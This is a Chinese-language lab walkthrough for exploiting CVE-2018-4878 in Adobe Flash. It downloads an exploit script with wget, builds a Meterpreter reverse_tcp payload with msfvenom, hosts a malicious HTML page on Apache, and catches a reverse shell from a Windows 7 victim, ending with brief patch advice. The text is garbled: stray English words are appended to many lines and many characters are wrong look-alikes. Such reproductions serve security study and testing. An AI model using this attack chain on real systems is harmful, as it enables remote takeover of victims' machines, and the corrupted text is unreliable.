1、前言介绍 html
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其以前的版本,存在高危漏洞(CVE-2018-4878)。python
从Adobe公告来看,这个漏洞的野外攻击样本最先是由韩国计算机应急响应小组(KRCERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发 起攻击。git
攻击者经过构造特殊的Flash连接,当用户用浏览器/邮件/Office访问此Flash连接时,会 被“远程代码执行”,而且直接被getshell。github
2、本文测试环境 web
攻击机:kali IP:192.168.44.128shell
靶机:windows7 IP:192.168.44.140+IE8+FLASH Player28.0.0.137(及之前版本)apache
一、下载CVE-2018-4878利用脚本到kali机 wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018- 4878.rarwindows
二、解压后以下图,可看到cve-2018-4878.py,exploit.swf 其实以后咱们仍是要本身生成一个index2.html的浏览器
三、Windows7 安装flash插件安全
3、漏洞复现
一、先在kali里面把cve-2018-4878.py的stageless = True修改为False
二、使用msf生成shell代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=your host lport=your port -f python>shellcode.txt
其中:lhost为kali的ip地址,lport为监听的端口
查看生成的shellcode.txt
三、将生成的shellcode.txt的内容更换到cve-2018-4878.py的shellcode
四、在kali下执行cve-2018-4878.py,注意要和index2.html,在同一个文件夹下
五、在kali里面开启Apache2服务,并将两个文件放到/var/www/html目录(apache web路径)
如今,kali上的web服务已经启动,而且已经有了index2.html这个web页面,咱们须要用靶机win7访问这个页面
六、kali上开启shell会话监听
进入msf,使用handler监听模块
回弹一个tcp链接
设置kali的ip,监听的端口号
启动服务
七、使用win7靶机的已开启flash服务的浏览器进行访问index2.html
八、回到kali,已经进入meterpreter模块
九、当靶机访问恶意的index2.html页面,便可触发反弹shell
4、漏洞修复
将flash经过官网升级到最新版本
或者,关闭flash的使用